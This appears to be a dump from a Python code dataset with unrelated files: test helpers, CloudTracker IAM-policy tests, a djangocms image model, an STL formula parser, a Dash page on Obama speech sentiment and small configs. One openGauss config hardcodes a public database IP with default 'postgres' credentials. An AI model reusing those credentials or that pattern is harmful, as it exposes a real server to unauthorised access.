raise ValueError('If `num` is not passed, `min_num` or `max_num` are expected')
if num is not None and (min_num is not None or max_num is not None):
raise ValueError('If `num` is passed, `min_num` and `max_num` are not expected')
self.num = num
self.min_num = min_num
self.max_num = max_num
self.checkpoints = checkpoints
self.log = 'ASSERT-NUM-COMMANDS-%s'
if self.num is not None:
self.log += '---EQ-%d' % self.num
if self.min_num is not None:
self.log += '---MIN-%d' % self.min_num
if self.max_num is not None:
self.log += '---MAX-%d' % self.max_num
def __enter__(self):
self.starting_commands = self.test_case.count_commands()
if self.checkpoints:
self.test_case.connection.get(self.log % 'START')
return self
def __exit__(self, exc_type, exc_value, traceback):
if exc_type is not None:
return
if self.checkpoints:
self.test_case.connection.get(self.log % 'END')
# we remove 1 to ignore the "info" called in __enter__
final_commands = self.test_case.count_commands() - 1
# also two for checkpoints
if self.checkpoints:
final_commands = final_commands - 2
executed = final_commands - self.starting_commands
if self.checkpoints and executed != self.num:
self.test_case.connection.get((self.log % 'END') + '---FAILED-%s' % executed)
if self.num is not None:
self.test_case.assertEqual(
executed, self.num, "%d commands executed, %d expected" % (
executed, self.num
)
)
elif self.max_num is None:
self.test_case.assertTrue(
executed >= self.min_num, "%d commands executed, at least %d expected" % (
executed, self.min_num
)
)
elif self.min_num is None:
self.test_case.assertTrue(
executed <= self.max_num, "%d commands executed, at max %d expected" % (
executed, self.max_num
)
)
else:
self.test_case.assertTrue(
self.min_num <= executed <= self.max_num, "%d commands executed, expected to be at least %d and at max %d" % (
executed, self.min_num, self.max_num
)
)
|
python
|
from .newton_divided_differences import NewtonDifDiv
from .larange import Larange
from .linear_spline import LinearSpline
from .quadratic_spline import QuadraticSpline
from .cubic_spline import CubicSpline
|
python
|
/*
* Copyright (c) 2020 Huawei Technologies Co.,Ltd.
*
* openGauss is licensed under Mulan PSL v2.
* You can use this software according to the terms and conditions of the Mulan PSL v2.
* You may obtain a copy of Mulan PSL v2 at:
*
* http://license.coscl.org.cn/MulanPSL2
*
* THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND,
* EITHER EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT,
* MERCHANTABILITY OR FIT FOR A PARTICULAR PURPOSE.
* See the Mulan PSL v2 for more details.
*/
# -*- coding: utf-8 -*-
"""
desciption: system variables or other constant information
"""
import os
import requests
import argparse
CONFIG = {
'url': 'jdbc:postgresql://166.111.121.62:5432/',
'host': '166.111.121.62',
'port': 5432,
'driver': 'org.postgresql.Driver',
'username': 'postgres',
'password': 'postgres',
'schema': 'tpch1x',
'sqldir': 'tpch',
'logdir': 'rewrite_results'
}
class model_parameters():
def __init__(self):
self.cuda = False
self.fastmode = False
self.seed = 42
self.epochs = 100
self.lr = 0.01
self.weight_decay = 5e-4
self.hidden = 16
self.dropout = 0.5
def parse_cmd_args():
parser = argparse.ArgumentParser()
# benchmark
parser.add_argument('--iteration_num', type=int, default=230, help='')
parser.add_argument('--workload_num', type=int, default=3184, help='The number of queries')
parser.add_argument('--feature_num', type=int, default=2, help='The number of vertex features')
parser.add_argument('--node_dim', type=int, default=30, help='The size of intermediate network layers')
args = parser.parse_args()
argus = vars(args)
return argus
|
python
|
from setuptools import setup, find_packages
setup(
name='arranger',
version='1.1.2',
description="moves each file to its appropriate directory based on the file's extension.",
author='j0eTheRipper',
author_email='[email protected]',
url='https://github.com/j0eTheRipper/arranger',
scripts=['src/arrange'],
packages=['engine', 'engine.Extensions', 'engine.File', 'engine.DIR'],
package_dir={'engine': 'src/engine'},
)
|
python
|
"""
Copyright 2018 Duo Security
Redistribution and use in source and binary forms, with or without modification, are permitted provided that the
following conditions are met:
1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following
disclaimer.
2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the
following disclaimer in the documentation and/or other materials provided with the distribution.
3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote
products derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES,
INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR
SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY,
WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE
USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
---------------------------------------------------------------------------
"""
import sys
import unittest
from unittest.mock import patch
from io import StringIO
from contextlib import contextmanager
from cloudtracker import (get_role_allowed_actions,
get_role_iam,
make_list,
normalize_api_call,
print_actor_diff,
print_diff,
Privileges,
read_aws_api_list)
@contextmanager
def capture(command, *args, **kwargs):
"""Capture stdout in order to check it"""
out, sys.stdout = sys.stdout, StringIO()
try:
command(*args, **kwargs)
sys.stdout.seek(0)
yield sys.stdout.read()
finally:
sys.stdout = out
class TestCloudtracker(unittest.TestCase):
"""Test class for cloudtracker"""
aws_api_list = None
def __init__(self, *args, **kwargs):
super(TestCloudtracker, self).__init__(*args, **kwargs)
self.aws_api_list = read_aws_api_list()
def test_make_list(self):
"""Test make_list"""
self.assertEquals(["hello"], make_list("hello"))
def test_get_actions_from_statement(self):
"""Test get_actions_from_statement"""
privileges = Privileges(self.aws_api_list)
stmt = {"Action": ["s3:PutObject"], "Resource": "*", "Effect": "Allow"}
self.assertEquals(privileges.get_actions_from_statement(stmt),
{'s3:putobject': True})
stmt = {"Action": ["s3:PutObject*"], "Resource": "*", "Effect": "Allow"}
self.assertEquals(privileges.get_actions_from_statement(stmt),
{'s3:putobject': True, 's3:putobjectacl': True, 's3:putobjecttagging': True})
stmt = {"Action": ["s3:*ObjectT*"], "Resource": "*", "Effect": "Allow"}
self.assertEquals(privileges.get_actions_from_statement(stmt),
{'s3:deleteobjecttagging': True,
's3:getobjecttagging': True,
's3:getobjecttorrent': True,
's3:putobjecttagging': True})
def test_policy(self):
"""Test having multiple statements, some allowed, some denied"""
privileges = Privileges(self.aws_api_list)
# Create a privilege object with some allowed and denied
stmt = {"Action": ["s3:*ObjectT*"], "Resource": "*", "Effect": "Allow"}
privileges.add_stmt(stmt)
stmt = {'Action': ['s3:GetObjectTagging', 's3:GetObjectTorrent'],
"Resource": "*",
"Effect": "Deny"}
privileges.add_stmt(stmt)
self.assertEquals(sorted(privileges.determine_allowed()),
sorted(['s3:putobjecttagging', 's3:deleteobjecttagging']))
def test_get_actions_from_statement_with_resources(self):
"""
Test that even when we are denied access to one resource,
the actions are still marked as allowed.
"""
privileges = Privileges(self.aws_api_list)
policy = [
{
"Action": "s3:*",
"Effect": "Allow",
"Resource": "*"
},
{
"Action": "s3:CreateBucket",
"Effect": "Deny",
"Resource": "*"
},
{
"Action": "s3:*",
"Effect": "Deny",
"Resource": [
"arn:aws:s3:::super-sensitive-bucket",
"arn:aws:s3:::super-sensitive-bucket/*"
]
}
]
for stmt in policy:
privileges.add_stmt(stmt)
self.assertTrue('s3:deletebucket' in privileges.determine_allowed())
self.assertTrue('s3:createbucket' not in privileges.determine_allowed())
def test_get_actions_from_statement_with_array_of_resources(self):
"""
Test array of resources
"""
privileges = Privileges(self.aws_api_list)
policy = [
{
"Action": "s3:*",
"Effect": "Allow",
"Resource": "*"
},
{
"Action": "s3:CreateBucket",
"Effect": "Deny",
"Resource": ["arn:aws:s3:::super-sensitive-bucket", "*"]
}
]
for stmt in policy:
privileges.add_stmt(stmt)
self.assertTrue('s3:deletebucket' in privileges.determine_allowed())
self.assertTrue('s3:createbucket' not in privileges.determine_allowed())
def test_get_actions_from_statement_with_conditions(self):
"""
Test that even when we are denied access based on a condition,
the actions are still marked as allowed.
"""
privileges = Privileges(self.aws_api_list)
policy = [
{
"Sid": "AllowAllActionsForEC2",
"Effect": "Allow",
"Action": "ec2:*",
"Resource": "*"
},
{
"Sid": "DenyStopAndTerminateWhenMFAIsNotPresent",
"Effect": "Deny",
"Action": [
"ec2:StopInstances",
"ec2:TerminateInstances"
],
"Resource": "*",
"Condition": {"BoolIfExists": {"aws:MultiFactorAuthPresent": False}}
}
]
for stmt in policy:
privileges.add_stmt(stmt)
self.assertTrue('ec2:startinstances' in privileges.determine_allowed())
self.assertTrue('ec2:stopinstances' in privileges.determine_allowed())
def test_normalize_api_call(self):
"""Test normalize_api_call"""
# Ensure the numbers at the end are removed
self.assertEquals(normalize_api_call('lambda', 'ListTags20170331'), 'lambda:listtags')
# Ensure service renaming occurs
self.assertEquals(normalize_api_call('monitoring', 'DescribeAlarms'), 'cloudwatch:describealarms')
def test_print_actor_diff(self):
"""Test print_actor_diff"""
with capture(print_actor_diff, [], [], False) as output:
self.assertEquals('', output)
# Test output when you have 3 configured users, but only two actually did anything
with capture(print_actor_diff, ['alice', 'bob'], ['alice', 'bob', 'charlie'], False) as output:
self.assertEquals(' alice\n bob\n- charlie\n', output)
def test_print_diff(self):
"""Test print_diff"""
with capture(print_diff, [], [], {}, False) as output:
self.assertEquals('', output)
def mocked_is_recorded_by_cloudtrail(action):
"""Instead of reading the whole file, just cherry pick this one action used in the tests"""
if action == 's3:putobject':
return False
return True
# One action allowed, and performed, and should be shown
with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
with capture(print_diff,
['s3:createbucket'], # performed
['s3:createbucket'], # allowed
{'show_benign': True, 'show_used': False, 'show_unknown': True}, False) as output:
self.assertEquals(' s3:createbucket\n', output)
# 3 actions allowed, one is used, one is unused, and one is unknown; show all
with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
with capture(print_diff,
['s3:createbucket', 'sts:getcalleridentity'], # performed
['s3:createbucket', 's3:putobject', 's3:deletebucket'], # allowed
{'show_benign': True, 'show_used': False, 'show_unknown': True}, False) as output:
self.assertEquals(' s3:createbucket\n- s3:deletebucket\n? s3:putobject\n', output)
# Same as above, but only show the used one
with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
with capture(print_diff,
['s3:createbucket', 'sts:getcalleridentity'], # performed
['s3:createbucket', 's3:putobject', 's3:deletebucket'], # allowed
{'show_benign': True, 'show_used': True, 'show_unknown': True}, False) as output:
self.assertEquals(' s3:createbucket\n', output)
# Hide the unknown
with patch('cloudtracker.is_recorded_by_cloudtrail', side_effect=mocked_is_recorded_by_cloudtrail):
with capture(print_diff,
['s3:createbucket', 'sts:getcalleridentity'], # performed
['s3:createbucket', 's3:putobject', 's3:deletebucket'], # allowed
{'show_benign': True, 'show_used': False, 'show_unknown': False}, False) as output:
self.assertEquals(' s3:createbucket\n- s3:deletebucket\n', output)
# Role IAM policy to be used in different tests
role_iam = {
"AssumeRolePolicyDocument": {},
"RoleId": "AROA00000000000000000",
"CreateDate": "2017-01-01T00:00:00Z",
"InstanceProfileList": [],
"RoleName": "test_role",
"Path": "/",
"AttachedManagedPolicies": [],
"RolePolicyList": [
{
"PolicyName": "KmsDecryptSecrets",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"kms:DescribeKey",
"kms:Decrypt"
],
"Resource": "*",
"Effect": "Allow",
"Sid": ""
}
]
}
},
{
"PolicyName": "S3PutObject",
"PolicyDocument": {
"Version": "2012-10-17",
"Statement": [
{
"Action": [
"s3:PutObject",
"s3:PutObjectAcl",
"s3:ListBucket"
],
"Resource": "*",
"Effect": "Allow"
}
]
}
}
],
"Arn": "arn:aws:iam::111111111111:role/test_role"
}
def test_get_role_iam(self):
"""Test get_role_iam"""
account_iam = {
"RoleDetailList": [self.role_iam],
"UserDetailList": [],
"GroupDetailList": [],
"Policies": []
}
self.assertEquals(self.role_iam, get_role_iam("test_role", account_iam))
def test_get_role_allowed_actions(self):
"""Test get_role_allowed_actions"""
account_iam = {
"RoleDetailList": [self.role_iam],
"UserDetailList": [],
"GroupDetailList": [],
"Policies": []
}
aws_api_list = read_aws_api_list()
self.assertEquals(sorted(['s3:putobject', 'kms:describekey', 'kms:decrypt', 's3:putobjectacl']),
sorted(get_role_allowed_actions(aws_api_list, self.role_iam, account_iam)))
|
python
|
from django.apps import AppConfig
class ProntuariomedicoConfig(AppConfig):
name = 'prontuarioMedico'
|
python
|
"""
Enables the user to add an "Image" plugin that displays an image
using the HTML <img> tag.
"""
from django.conf import settings
from django.core.exceptions import ValidationError
from django.db import models
from django.utils.translation import gettext
from django.utils.translation import gettext_lazy as _
from cms.models import CMSPlugin
from cms.models.fields import PageField
from djangocms_attributes_field.fields import AttributesField
from easy_thumbnails.files import get_thumbnailer
from filer.fields.image import FilerImageField
from filer.models import ThumbnailOption
# add setting for picture alignment, renders a class or inline styles
# depending on your template setup
def get_alignment():
alignment = getattr(
settings,
'DJANGOCMS_PICTURE_ALIGN',
(
('left', _('Align left')),
('right', _('Align right')),
('center', _('Align center')),
)
)
return alignment
# Add additional choices through the ``settings.py``.
def get_templates():
choices = [
('default', _('Default')),
]
choices += getattr(
settings,
'DJANGOCMS_PICTURE_TEMPLATES',
[],
)
return choices
# use golden ration as default (https://en.wikipedia.org/wiki/Golden_ratio)
PICTURE_RATIO = getattr(settings, 'DJANGOCMS_PICTURE_RATIO', 1.6180)
# required for backwards compability
PICTURE_ALIGNMENT = get_alignment()
LINK_TARGET = (
('_blank', _('Open in new window')),
('_self', _('Open in same window')),
('_parent', _('Delegate to parent')),
('_top', _('Delegate to top')),
)
RESPONSIVE_IMAGE_CHOICES = (
('inherit', _('Let settings.DJANGOCMS_PICTURE_RESPONSIVE_IMAGES decide')),
('yes', _('Yes')),
('no', _('No')),
)
class AbstractPicture(CMSPlugin):
"""
Renders an image with the option of adding a link
"""
template = models.CharField(
verbose_name=_('Template'),
choices=get_templates(),
default=get_templates()[0][0],
max_length=255,
)
picture = FilerImageField(
verbose_name=_('Image'),
blank=True,
null=True,
on_delete=models.SET_NULL,
related_name='+',
)
external_picture = models.URLField(
verbose_name=_('External image'),
blank=True,
null=True,
max_length=255,
help_text=_(
'If provided, overrides the embedded image. '
'Certain options such as cropping are not applicable to external images.'
)
)
width = models.PositiveIntegerField(
verbose_name=_('Width'),
blank=True,
null=True,
help_text=_(
'The image width as number in pixels. '
'Example: "720" and not "720px".'
),
)
height = models.PositiveIntegerField(
verbose_name=_('Height'),
blank=True,
null=True,
help_text=_(
'The image height as number in pixels. '
'Example: "720" and not "720px".'
),
)
alignment = models.CharField(
verbose_name=_('Alignment'),
choices=get_alignment(),
blank=True,
max_length=255,
help_text=_('Aligns the image according to the selected option.'),
)
caption_text = models.TextField(
verbose_name=_('Caption text'),
blank=True,
null=True,
help_text=_('Provide a description, attribution, copyright or other information.')
)
attributes = AttributesField(
verbose_name=_('Attributes'),
blank=True,
excluded_keys=['src', 'width', 'height'],
)
# link models
link_url = models.URLField(
verbose_name=_('External URL'),
blank=True,
null=True,
max_length=2040,
help_text=_('Wraps the image in a link to an external URL.'),
)
link_page = PageField(
verbose_name=_('Internal URL'),
blank=True,
null=True,
on_delete=models.SET_NULL,
help_text=_('Wraps the image in a link to an internal (page) URL.'),
)
link_target = models.CharField(
verbose_name=_('Link target'),
choices=LINK_TARGET,
blank=True,
max_length=255,
)
link_attributes = AttributesField(
verbose_name=_('Link attributes'),
blank=True,
excluded_keys=['href', 'target'],
)
# cropping models
# active per default
use_automatic_scaling = models.BooleanField(
verbose_name=_('Automatic scaling'),
blank=True,
default=True,
help_text=_('Uses the placeholder dimensions to automatically calculate the size.'),
)
# ignores all other cropping options
# throws validation error if other cropping options are selected
use_no_cropping = models.BooleanField(
verbose_name=_('Use original image'),
blank=True,
default=False,
help_text=_('Outputs the raw image without cropping.'),
)
# upscale and crop work together
# throws validation error if other cropping options are selected
use_crop = models.BooleanField(
verbose_name=_('Crop image'),
blank=True,
default=False,
help_text=_('Crops the image according to the thumbnail settings provided in the template.'),
)
use_upscale = models.BooleanField(
verbose_name=_('Upscale image'),
blank=True,
default=False,
help_text=_('Upscales the image to the size of the thumbnail settings in the template.')
)
use_responsive_image = models.CharField(
verbose_name=_('Use responsive image'),
max_length=7,
choices=RESPONSIVE_IMAGE_CHOICES,
default=RESPONSIVE_IMAGE_CHOICES[0][0],
help_text=_(
'Uses responsive image technique to choose better image to display based upon screen viewport. '
'This configuration only applies to uploaded images (external pictures will not be affected). '
)
)
# overrides all other options
# throws validation error if other cropping options are selected
thumbnail_options = models.ForeignKey(
ThumbnailOption,
verbose_name=_('Thumbnail options'),
blank=True,
null=True,
help_text=_('Overrides width, height, and crop; scales up to the provided preset dimensions.'),
on_delete=models.CASCADE,
)
# Add an app namespace to related_name to avoid field name clashes
# with any other plugins that have a field with the same name as the
# lowercase of the class name of this model.
# https://github.com/divio/django-cms/issues/5030
cmsplugin_ptr = models.OneToOneField(
CMSPlugin,
related_name='%(app_label)s_%(class)s',
parent_link=True,
on_delete=models.CASCADE,
)
class Meta:
abstract = True
def __str__(self):
if self.picture and self.picture.label:
return self.picture.label
return str(self.pk)
def get_short_description(self):
if self.external_picture:
return self.external_picture
if self.picture and self.picture.label:
return self.picture.label
return gettext('<file is missing>')
def copy_relations(self, oldinstance):
# Because we have a ForeignKey, it's required to copy over
# the reference from the instance to the new plugin.
self.picture = oldinstance.picture
def get_size(self, width=None, height=None):
crop = self.use_crop
upscale = self.use_upscale
# use field thumbnail settings
if self.thumbnail_options:
width = self.thumbnail_options.width
height = self.thumbnail_options.height
crop = self.thumbnail_options.crop
upscale = self.thumbnail_options.upscale
elif not self.use_automatic_scaling:
width = self.width
height = self.height
# calculate height when not given according to the
# golden ratio or fallback to the picture size
if not height and width:
height = int(width / PICTURE_RATIO)
elif not width and height:
width = int(height * PICTURE_RATIO)
elif not width and not height and self.picture:
width = self.picture.width
height = self.picture.height
options = {
'size': (width, height),
'crop': crop,
'upscale': upscale,
}
return options
def get_link(self):
if self.link_url:
return self.link_url
elif self.link_page_id:
return self.link_page.get_absolute_url(language=self.language)
elif self.external_picture:
return self.external_picture
return False
def clean(self):
# there can be only one link type
if self.link_url and self.link_page_id:
raise ValidationError(
gettext(
'You have given both external and internal links. '
'Only one option is allowed.'
)
)
# you shall only set one image kind
if not self.picture and not self.external_picture:
raise ValidationError(
gettext(
'You need to add either an image, '
'or a URL linking to an external image.'
)
)
# certain cropping options do not work together, the following
# list defines the disallowed options used in the ``clean`` method
invalid_option_pairs = [
('use_automatic_scaling', 'use_no_cropping'),
('use_automatic_scaling', 'thumbnail_options'),
('use_no_cropping', 'use_crop'),
('use_no_cropping', 'use_upscale'),
('use_no_cropping', 'thumbnail_options'),
('thumbnail_options', 'use_crop'),
('thumbnail_options', 'use_upscale'),
]
# invalid_option_pairs
invalid_option_pair = None
for pair in invalid_option_pairs:
if getattr(self, pair[0]) and getattr(self, pair[1]):
invalid_option_pair = pair
break
if invalid_option_pair:
message = gettext(
'Invalid cropping settings. '
'You cannot combine "{field_a}" with "{field_b}".'
)
message = message.format(
field_a=self._meta.get_field(invalid_option_pair[0]).verbose_name,
field_b=self._meta.get_field(invalid_option_pair[1]).verbose_name,
)
raise ValidationError(message)
@property
def is_responsive_image(self):
if self.external_picture:
return False
if self.use_responsive_image == 'inherit':
return getattr(settings, 'DJANGOCMS_PICTURE_RESPONSIVE_IMAGES', False)
return self.use_responsive_image == 'yes'
@property
def img_srcset_data(self):
if not (self.picture and self.is_responsive_image):
return None
srcset = []
thumbnailer = get_thumbnailer(self.picture)
picture_options = self.get_size(self.width, self.height)
picture_width = picture_options['size'][0]
thumbnail_options = {'crop': picture_options['crop']}
breakpoints = getattr(
settings,
'DJANGOCMS_PICTURE_RESPONSIVE_IMAGES_VIEWPORT_BREAKPOINTS',
[576, 768, 992],
)
for size in filter(lambda x: x < picture_width, breakpoints):
thumbnail_options['size'] = (size, size)
srcset.append((int(size), thumbnailer.get_thumbnail(thumbnail_options)))
return srcset
@property
def img_src(self):
# we want the external picture to take priority by design
# please open a ticket if you disagree for an open discussion
if self.external_picture:
return self.external_picture
# picture can be empty, for example when the image is removed from filer
# in this case we want to return an empty string to avoid #69
elif not self.picture:
return ''
# return the original, unmodified picture
elif self.use_no_cropping:
return self.picture.url
picture_options = self.get_size(
width=self.width or 0,
height=self.height or 0,
)
thumbnail_options = {
'size': picture_options['size'],
'crop': picture_options['crop'],
'upscale': picture_options['upscale'],
'subject_location': self.picture.subject_location,
}
thumbnailer = get_thumbnailer(self.picture)
return thumbnailer.get_thumbnail(thumbnail_options).url
class Picture(AbstractPicture):
class Meta:
abstract = False
|
python
|
import lark
import copy
import torch
class LogicParser:
""" This class defines the grammar of the STL according to
the EBNF syntax and builds the AST accordingly.
"""
_grammar = """
start: prop
prop: VAR CMP (CONST | VAR) -> atom
| _NOT "(" prop ")" -> op_not
| (prop _OR)+ prop -> op_or
| (prop _AND)+ prop -> op_and
| ltl_op "(" prop ")" -> operator
ltl_op: letter
letter: LTL_OPERATOR
_NOT: "!"
_AND: "&"
_OR: "|"
LTL_OPERATOR : ("F" | "G")
CMP: ("<=" | "<" | ">=" | ">" | "!=" | "==")
VAR: /[a-z_]+/
CONST: SIGNED_NUMBER
%import common.INT
%import common.DECIMAL
%import common.SIGNED_NUMBER
%import common.WORD
%import common.WS
%ignore WS
"""
def __init__(self, formula):
parser = lark.Lark(self._grammar)
self._tree = parser.parse(formula)
@property
def parse_tree(self):
return copy.deepcopy(self._tree)
def __str__(self):
return self._tree.pretty()
class Functions:
""" Encapsulate the set of functions allowed to be called
from the formula built starting from the AST
"""
@staticmethod
def not_(x):
return -x
@staticmethod
def and_(a, b):
return torch.min(a, b)
@staticmethod
def or_(a, b):
return torch.max(a, b)
@staticmethod
def finally_(f):
return torch.max(f)
@staticmethod
def globally_(f):
return torch.min(f)
@lark.v_args(inline=True)
class _CodeBuilder(lark.Transformer):
""" Set of rules to traverse the AST and build a customized formula.
Basically it rewrites a formula starting from the AST to have
fine control on the operations that will be carried out the the
specific semantic.
"""
def atom(self, *args):
operand_a, operator, operand_b = args
if operator == '>=':
return f'{operand_a} - {operand_b}'
elif operator == '>':
raise NotImplementedError
elif operator == '<=':
return f'{operand_b} - {operand_a}'
elif operator == '<':
raise NotImplementedError
elif operator == '==' or '!=':
raise NotImplementedError
def op_not(self, preposition):
return 'fn.not_(' + preposition + ')'
def op_and(self, preposition_a, preposition_b):
args = [preposition_a, preposition_b]
return 'fn.and_(' + ', '.join(args) + ')'
def op_or(self, preposition_a, preposition_b):
args = [preposition_a, preposition_b]
return 'fn.or_(' + ', '.join(args) + ')'
def ltl_op(self, *parameters):
return list(map(lambda x: str(x.children[0]), parameters))
def operator(self, params, preposition):
if len(params) > 1:
raise NotImplementedError
else:
letter = params[0]
operator_args = [preposition]
if letter == 'F':
function = 'fn.finally_'
elif letter == 'G':
function = 'fn.globally_'
return function + '(' + ', '.join(operator_args) + ')'
def start(self, preposition):
return str(preposition)
class DiffQuantitativeSemantic:
""" This class is used as API to build an STL formula and apply
it to arbitrary signals according to the quantitative semantics.
"""
def __init__(self, logic_formula):
"""Get the parse-tree and call the method _build on it"""
if isinstance(logic_formula, str):
self.logic_parser = LogicParser(logic_formula)
else:
self.logic_parser = logic_formula
self._code = self._build()
def _build(self):
"""Compute the internal representation for the semantic"""
tree = self.logic_parser.parse_tree
code = _CodeBuilder().transform(tree)
return code
def compute(self, **signals):
environment = {
'fn': Functions,
}
environment.update(signals)
return eval(self._code, environment)
def __str__(self):
return self._code
|
python
|
from dash import Input, Output, callback
from dash import dcc
import dash.html as html
import dash_bootstrap_components as dbc
from pages.constants import TITLE_STYLE, PARAGRAPH_STYLE, IMG_STYLE
from utils.topic_crud import TopicCRUD
import plotly.express as px
df = px.data.iris() # iris is a pandas DataFrame
fig = px.scatter(df, x="sepal_width", y="sepal_length")
topic_plotter = TopicCRUD()
item_1 = [
"This is the content of the first section",
dcc.Graph(figure=fig)
]
topic_2_accordion = [
'This is the topics for the accordion',
html.Div([
dcc.Slider(min=1, max=25, step=1,
id='second-topic-slider',
value=10,
tooltip={"placement": "bottom", "always_visible": True}
)]),
dcc.Graph(id='second-topic-figure')
]
topics_by_city_accordion = [
'This is the topics for the accordion',
dcc.Graph(id='topic-cities-figure')
]
topic_presence_accordion = [
'This is the topics for the accordion',
dcc.Graph(id='topic-presence-figure')
]
topic_word_relevance = [
'This is the topics for the accordion',
dcc.Input(id='word-presence-input'),
dcc.Graph(id='topic-words-figure')
]
topic_speech_topics = [
'This is the topics for the accordion',
dcc.Dropdown(),
dcc.Graph(id='topic-speeches-figure')
]
accordion = dbc.Accordion(
[
dbc.AccordionItem(
item_1, title="Topic - Key words"
),
dbc.AccordionItem(
topic_2_accordion, title="Secondary topic"
),
dbc.AccordionItem(
topics_by_city_accordion, title="Topic location"
),
dbc.AccordionItem(
topic_word_relevance, title="Word relevance"
),
dbc.AccordionItem(
topic_speech_topics, title="Important topics by speach"
),
],
start_collapsed=True,
always_open=True,
flush=True
)
body = dbc.Container([
# Title page
dbc.Row(
[
html.H1(
'Conclusions', style=TITLE_STYLE)
],
justify='center',
align='center',
),
# Image of obama,
dbc.Row(
[
dbc.Col(
[
html.Img(
src='assets/obama-farewell.jpg',
style=IMG_STYLE
),
dcc.Markdown('''_President Obama Caps Long Goodbye With Farewell Speech
Copyright: Copyright 2017 The Associated Press. All rights reserved._
''', style=TITLE_STYLE)
],
align='center',
)
],
align='center'
),
# Contains
dbc.Row(
[
dcc.Markdown('''
What are the variables of Obama\'s speeches? Our answers based on the analyses are:
- Obama tends to be more negative when he talks about foreign conflict and terrorism, gun violence, the economy, immigration, and civil rights.
- Obama tends to be more positive when he talks about elections, education, faith and family.
- The overall mean for the sentiment is more positive (0.1).
- All topics have a positive sentiment, the "more negative" topics are below the overall average, but their mean sentiment score is positive.
- Obama's job (dis)approval tracker does not have an impact on the sentiment of his speeches. But more dynamics in the tracker coincides with his 2nd presidential term (2013-2017).
- Gun deaths by assault has a negative effect on the sentiment of his speeches. More deaths associate with more negative sentiments in the speeches.
- The positively improving people's perception of the financial situation and job market in the US coincides with Obama's increasingly positive speeches related to economy.
'''),
],
justify='center',
align='center',
),
# dbc.Row(
# accordion
# )
], style={'height': '100%'})
layout = html.Div([
body
])
|
python
|
#!/usr/bin/python
class race:
def __init__(self, t):
self.title = t
#ACCESSORS
def titleReturn(self):
return(self.title)
|
python
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.